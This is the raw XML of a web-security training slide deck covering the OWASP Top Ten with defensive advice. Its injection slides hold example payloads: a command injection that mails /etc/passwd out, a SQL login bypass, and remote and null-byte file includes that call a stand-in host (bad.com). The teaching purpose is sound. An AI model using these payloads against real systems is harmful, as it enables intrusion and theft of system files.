              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function Level Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92164" name="Picture 4" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.05 - CERN course\materials\owasp-logo.jpe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49346" y="0"/>
            <a:ext cx="2816225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4609967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9875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A1: Injection flaws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500" smtClean="0"/>
              <a:t>Executing code provided (injected) by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>LDAP, XPath, SSI injection etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" smtClean="0"/>
              <a:t>Solutions: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t> user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t> values (use escape functions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterized queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>(SQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>enforce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>when accessing a DB, OS etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1066800" y="3067050"/>
            <a:ext cx="8362950" cy="785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266700" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat confirmation | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat /etc/passwd  | mail me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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1066800" y="1882775"/>
            <a:ext cx="8362950" cy="774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266700" indent="-266700">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and pwd = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anything’ or ’x’ = ’x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6369050" y="5072063"/>
            <a:ext cx="1560513" cy="461962"/>
            <a:chOff x="6369544" y="5046674"/>
            <a:chExt cx="1560042" cy="461665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7416978" y="5118065"/>
              <a:ext cx="357080" cy="35695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4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6526660" y="5118065"/>
              <a:ext cx="214247" cy="35695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95241" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6369544" y="5046674"/>
              <a:ext cx="1560042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marL="0" lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>’ -&gt; \’</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23931252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071563" y="3319463"/>
            <a:ext cx="7715250" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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1071563" y="4214813"/>
            <a:ext cx="7715250" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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1071563" y="5126038"/>
            <a:ext cx="7715250" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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1071563" y="2428875"/>
            <a:ext cx="7715250" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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9626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Similar to A1: Malicious file execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8294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Remote, hostile content provided by the attacker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is included, processed or invoked by the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote file include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(RFI) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local file include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   include(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_GET["page"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> . ".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://bad.com/exploit.txt?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://bad.com/exploit.txt?.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://site.com/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\ftp\upload\exploit.png%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>└</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> include("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\ftp\upload\exploit.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286625" y="5429250"/>
            <a:ext cx="1700213" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73121"/>
              <a:gd name="adj2" fmla="val -46901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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string ends at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not added</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3384554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7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5" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
    </p:bld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1225</TotalTime>
  <Words>1441</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>322</Paragraphs>
  <Slides>26</Slides>
  <Notes>22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27" baseType="lpstr">
      <vt:lpstr>Default Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Focus on Web applications – why?</vt:lpstr>
      <vt:lpstr>Threats</vt:lpstr>
      <vt:lpstr>An incident in September 2008</vt:lpstr>
      <vt:lpstr>HTTP etc. – a quick reminder</vt:lpstr>
      <vt:lpstr>Google hacking</vt:lpstr>
      <vt:lpstr>OWASP Top Ten</vt:lpstr>
      <vt:lpstr>A1: Injection flaws</vt:lpstr>
      <vt:lpstr>Similar to A1: Malicious file execution</vt:lpstr>
      <vt:lpstr>A2: Broken authn &amp; session mgmt</vt:lpstr>
      <vt:lpstr>A3: Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>A4: Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>A7: Missing Function Level Access Control</vt:lpstr>
      <vt:lpstr>A8: Cross-site request forgery</vt:lpstr>
      <vt:lpstr>Client-server –  no trust</vt:lpstr>
      <vt:lpstr>Advice</vt:lpstr>
      <vt:lpstr>Harden the Web server</vt:lpstr>
      <vt:lpstr>Programming in PHP</vt:lpstr>
